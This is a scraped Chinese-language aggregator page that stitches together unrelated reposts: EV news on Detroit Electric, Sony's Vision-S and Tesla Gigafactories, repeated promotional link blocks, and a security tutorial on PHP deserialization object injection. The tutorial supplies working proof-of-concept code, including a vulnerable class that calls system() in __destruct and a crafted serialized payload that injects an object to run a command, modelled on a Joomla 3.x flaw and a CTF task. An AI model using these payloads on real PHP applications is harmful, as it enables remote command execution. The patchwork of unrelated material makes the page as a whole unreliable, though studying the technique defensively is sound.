底特律電動汽車是由位於底特律的Anderson電動汽車公司生產的一款純電動汽車品牌，底特律電動汽車品牌在2008年的時候正式回歸市場。  
  雖然旗下的SP:01車型還沒有真正的上市銷售，但是根據消息稱，該品牌的電動汽車已經計畫在2019年將推出兩款全新的純電動車型。有趣的是，與特斯拉一樣，它推出的首款進軍汽車市場的車型是一款純電動車型；另外，其SP:01也是在Lotus Elise車型的基礎上打造而來的純電動車型。但是底特律電動汽車卻極力與特斯拉劃清界限，聲稱他們並不是步特斯拉的後塵。   在其SP:01車型正式發佈之後，近日底特律電動汽車已經開始投入另外兩款全新的純電動車型的研發工作，一款為SUV車型；一款為轎車車型。但是，他們同特斯拉有著較大的區別。底特律電動汽車聲稱，在其新款電動車型推向市場的同時還將實現年產50000到60000的產量目標。   文章來源：鳳凰汽車

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

電動車市場逐漸步上正軌，先前許多大動作要進入電動車領域，喊出或暗示要打造電動車的電子大廠卻開始打退堂鼓。在諸多電子大廠的退卻潮下，Sony 千山萬水我獨行，推出 Vision-S 電動概念車，是「人棄我取」的逆行觀念，還是只是「項莊舞劍，意在沛公」？

以蘋果（Apple）來說，先前曾經傳出「泰坦計畫」（Project Titan）要在 2019 年推出自家電動車，2019 年都過去了，卻無消無息，事實上蘋果在幾年前就改換電動車領域的發展方向，雖然蘋果仍不斷在電動車領域申請專利，但是專利大多集中在資訊娛樂系統，以及自動駕駛軟體，而非打造一輛完整的車。

英國吸塵器大廠戴森（Dyson），原本對電動車也有雄圖大略，2015 年購併固態電池新創事業 Sakti3 後，原本有 25 億英鎊的大計畫，包括 2018 年在新加坡建廠，以及打造電動車，到 2019 年 10 月，戴森打了退堂鼓，表示儘管研發極盡努力，卻無法打造出商業可獲利的車款。

蘋果與戴森的退卻，顯示一個基本問題，那就是即使電動車跳過最複雜的內燃機引擎部分，打造汽車仍是相當高技術門檻的事，並非藉由電子方面的專長就能打造電動車。要打造一輛能熬過日曬雨淋下雪，在路上經歷 15 年的車輛，是相當複雜且需要工程技術的任務，汽車大廠數十年來精研於此，就算排除內燃機引擎部分，仍非一朝一夕可超越。

Google 於 2016 年將自駕車部門獨立成為 Waymo，Waymo 也放棄自己打造自駕車，2019 年 Waymo 在亞利桑那州開始試營運自駕計程車，不過使用的是第三方車廠的車改造，克萊斯勒（Chrysler）Pacifica，以及捷豹（Jaguar）I-Pace，而非自行打造。

自動駕駛的軟硬體技術方面，科技大廠顯然仍興致高昂、摩拳擦掌，但要打造整輛車，這個主意從來都不現實。一開始科技大廠看到電動車能跳脫汽車業最困難尖端的內燃機引擎技術，替代為電子電機大廠熟悉的馬達與鋰電池，見獵心喜，認為這是打入長期由車廠壟斷的市場的良機，但很快就發現，汽車市場早已是割喉戰，要跳進去規模量產汽車，跟著割喉，並不是個好主意。

科技大廠打退堂鼓的根本原因，在於打造整輛車，毛利率遠低於軟體與消費性電子產品，這些原本位於高毛利產業的大廠，稍事研究後，就對進軍「茅山道士」（毛利 3%~4%）產業敬謝不敏，不如安於於當軟體技術與關鍵硬體供應商，因此蘋果樂於打造車用資訊娛樂系統軟體平台，而戴森樂於供應電池，但不想做整輛車。

此外，割喉戰還會越來越嚴重，原本只有特斯拉（Tesla）領頭開拓電動車市場，如今幾乎主要車廠都已經大力投入，而特斯拉本身也已經往平價車款發展，另一方面，中國廠商磨刀霍霍，想在中國低價電池廠的產能撐腰下積極投入，很快電動車市場就會如傳統汽車市場「割喉割到斷」，而且恐怕比過去更激烈。

中國本身 IT 巨頭，也採用投資的方式加入電動車市場，而非自身投入打造電動車，如騰訊投資和諧富騰、阿里巴巴投資小鵬汽車。連中國巨頭企業都迴避這個紅海戰場，那麼也就難怪歐美大廠從本來有興趣，改為退避三舍了。

千山萬水，Sony 獨行？

此股退卻潮中，唯一逆向而行的，大概只有日本電子大廠 Sony。2020 年 CES，Sony 宣布 Vision-S 概念電動車原型，車內車外內建 33 種不同感測器，車內資訊娛樂系統有好幾個寬螢幕顯示器、360 度環場音效、常時連線（always-on connectivity），其中部分技術來自音響大廠博世（Bosch），以及黑莓（BlackBerry）的行動無線通訊技術。此外，Sony 更打造全新設計的電動車平台，來自加拿大汽車零件供應大廠麥格納（Magna），不僅支援轎車也支援休旅車。

Vision-S 概念電動車相當有未來感，不過產業界對 Vision-S 最想知道的是：Sony 與麥格納，真的打算將這款車規模生產商業上市嗎？還是只是藉此展示車用平台及相關零組件、感測器、軟硬體技術？發表會當天，Sony 電動車發表時間並不長，且還強調 Sony 以影像感測器部門積極投資自動駕駛相關技術，包括強化原本的 CMOS，以及發展光雷達（LIDAR）、飛時測距鏡頭（Time-of-flight camera），以及複合多種感測器強化對環境的辨認能力。

就此看來， Sony 與麥格納仍是定位自身為平台與關鍵零組件供應商，Vision-S 概念電動車較可能只是為了展示所有想推銷給各大車廠的相關技術，而非真要把 Vision-S 掛上 Sony 品牌上市，否則，恐怕先要遭受全球車廠客戶抵制，得不償失。

無論如何，至少 Sony 還敢推出概念電動車原型，成為電子大廠進攻電動車市場的最後勇者，到底是「項莊舞劍，意在沛公」，最後跟其他電子大廠一樣只當車用平台零組件與軟硬體供應商，還是真會自己跳下去製造電動車，就看 Sony 有沒有豪賭的勇氣了。

（合作媒體：。首圖為Vision-S 電動概念車，來源：）

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

在6月6日舉辦的股東會議上，Tesla創辦人Elon Musk提到將在全球建至少10座到20座超級電池工廠（Gigafactory）以供應市場需求。

過去，Elon Musk曾提到以全球對電動車和儲能電池的需要，需要100座Gigafactory來應付市場需求。外媒指出，Elon Musk這番發言也暗示Tesla未來將佔全球10%的儲能和電動車的產能。

Tesla於美國內華達州的Gigafactory 1目前仍持續建造並且已進行鋰電池生產，Elon Musk於股東會議中提到，當Gigafactory 1產能全開時，其生產的鋰電池數量將會比全球其餘鋰電池工廠生產的總和還要多。

與Panasonic的合作使Tesla在生產池上有極大的優勢，其最終目標是生產先進且低價的鋰電池，同時Tesla視Gigafactory為一個「巨型機器」，會不斷改善和優化。

至於目前未來規劃中的3、4座Gigafactory的廠址還未定案，日前Elon Musk表示，2017年底將宣布它們的落腳處。由於Tesla位於加州費利蒙的工廠生產線已滿載，因此其中一座未來的Gigafactory將會用來生產新型SUV Model Y，其生產線也會於其他Gigafactory不同。

（圖片來源：Tesla Club Belgium via Flickr CC2.0）

本站聲明:網站內容來源於EnergyTrend https://www.energytrend.com.tw/ev/,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

1.漏洞產生原因：

序列化的字符串在經過過濾函數不正確的處理而導致對象注入，目前看到都是因為過濾函數放在了serialize函數之後，要是放在序列化之前應該就不會產生這個問題

?php
function filter($string){
  $a = str_replace('x','zz',$string);
   return $a;
}

$username = "tr1ple";
$password = "aaaaax";
$user = array($username, $password);

echo(serialize($user));
echo "\n";

$r = filter(serialize($user));

echo($r);
echo "\n";

var_dump(unserialize($r));
$a='a:2:{i:0;s:6:"tr1ple";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa";';
var_dump(unserialize($a));

php特性：

1.PHP 在反序列化時，底層代碼是以 ; 作為字段的分隔，以 } 作為結尾(字符串除外)，並且是根據長度判斷內容的
2.對類中不存在的屬性也會進行反序列化

以上代碼就明顯存在一個問題，即從序列化后的字符串中明顯可以看到經過filter函數以後s:6對應的字符串明顯變長了

並且如果對於a:2:{i:0;s:6:”tr1ple”;i:1;s:5:”aaaaa”;}i:1;s:5:”aaaaa”; 這種字符串而言，也能夠正常反序列化，說明php在反序列化的時候只要求一個反序列化字符串塊合法即可，當然得是第一個字符串塊

以以上代碼為例，如果能夠利用filter函數這種由一個字符變為兩個字符的特性來注入想要反序列化后得到的屬性，使其可以逃逸出更多可用的字符串，那麼我們就能反序列化得到我們想要的屬性

比如此時我們想要讓反序列化后第二個字符串為123456，此時我們的payload如果和之前的username長度為a，則filter處理以後可能username就會變成a，此時我們的payload變成了新的注入的屬性，此時反序列化后就會得到我們想要的結果，比如a:2:{i:0;s:6:”tr1ple”;i:1;s:6:”123456″;}是我們想要達到的效果，此時我們想要注入的payload明顯為：

";i:1;s:6:"123456";}

可以得到其長度為20

此時我們已經知道過濾的規則為x->yy，即注入一個x可以逃逸出一個字符的空位，那麼我們只需要注入20個x即可變成40個y，即可逃逸出20個空位，從而將我們的payload變為反序列化后得到的屬性值

$username = 'tr1plexxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}'; //其中紅色就是我們想要注入的屬性值 
$password="aaaaa";
$user = array($username, $password);
echo(serialize($user));
echo "\n";

$r = filter(serialize($user));

echo($r);
echo "\n";
var_dump(unserialize($r));

 可以看到此時注入屬性成功，反序列化后得到的屬性即為123456

2.實例分析

joomla3.0.0-3.4.6 對象注入導致的反序列化,以下為參考別人的簡易化核心漏洞代碼

<?php
class evil{
    public $cmd;

    public function __construct($cmd){
        $this->cmd = $cmd;
    }

    public function __destruct(){
        system($this->cmd);
    }
}

class User
{
    public $username;
    public $password;

    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
    }

}

function write($data){
    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
    file_put_contents("dbs.txt", $data);
}

function read(){
    $data = file_get_contents("dbs.txt");
    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
    return $r;
}

if(file_exists("dbs.txt")){
    unlink("dbs.txt");  
}

$username = "tr1ple";
$password = "A";
$payload = '";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}'; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

在這裏如果想要通過注入對象來實現反序列化則必須在外部對象內進行注入存在的屬性，不能在其外部，否則php將不會進行我們注入惡意對象的反序列化

例如此時因為反序列化讀取的時候將會將六位字符\0\0\0替換成三位字符chr(0)*chr(0),因此字符串前面的s肯定是固定的，那麼s對應的字符串變少以後將會吞掉其他屬性的字符，那麼如果我們精心算好吞掉的字符長度，並且能夠控制被吞掉屬性的內容，那麼就能夠注入對象，從而反序列化其他類

比如如上所示，此時我們要注入的對象為evil，此時username和password的值我們可控，那麼我們可以在username中注入\0，來吞掉password的值，比如

<?php
$a='\0\0\0';
echo strlen($a);
$b=str_replace('\0\0\0', chr(0).'*'.chr(0), $a);
echo strlen($b);

 所以此時首先確定我們要吞掉的字符的長度

O:4:”User”:2:{s:8:”username”;s:6:”tr1ple”;s:8:”password”;s:4:”1234″;}

正常情況下我們要吞掉 “;s:8:”password”;s:4:” 為22位

但是因為注入的對象payload也在password字段，並且長度肯定是>=10的，因此s肯定是兩位數，因此這裏為22+1=23位字符

因為是6->3，因此每次添加一組\0\0\0能多吞掉3個字符，因此需要肯定都是3的倍數

因此我們假如這裏構造username為\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0 

 則經過read函數處理后長度將變為24

 即此時能夠多吞掉24個字符，為了不讓其吞掉payload，我們可以填充1位字符A，即令password的值為A+payload即可

<?php
class evil{
    public $cmd;

    public function __construct($cmd){
        $this->cmd = $cmd;
    }

    public function __destruct(){
        system($this->cmd);
    }
}

class User
{
    public $username;
    public $password;

    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
    }

}

function write($data){
    $data = str_replace(chr(0).'*'.chr(0), '\0\0\0', $data);
    file_put_contents("dbs.txt", $data);
}

function read(){
    $data = file_get_contents("dbs.txt");
    $r = str_replace('\0\0\0', chr(0).'*'.chr(0), $data);
    return $r;
}

if(file_exists("dbs.txt")){
    unlink("dbs.txt");  
}

$username = "\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0";
$password = "A";
$payload = '";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}'; $shellcode=$password.$payload; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

 執行結果如上圖所示，將成功反序列化password屬性所對應的值，其值即為我們注入的對象，整個過程也容易理解，就是吞掉後面的屬性來注入屬性，那麼達到攻擊有以下要求：

1.相鄰兩個屬性的值是我們可以控制的

2.前一個屬性的s長度可以發生變化，變長變短都可以，變短的話可以吞掉後面相鄰屬性的值，然後在相鄰屬性中注入新的對象，如果邊長則可以直接在該屬性中注入對象來達到反序列化

 比如XNUCA2018 hardphp就考察了一個這個相關的trick

 這裏就出現了用前面的data在反序列化時向後吞一位字符，從而可以導致吞掉後面的普通用戶的username字段，而在username字段可以放上我們想要偽造的username，從而達到偽造session的目的

 參考：

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理【其他文章推薦】

※台北網頁設計公司這麼多，該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

※網頁設計公司推薦更多不同的設計風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整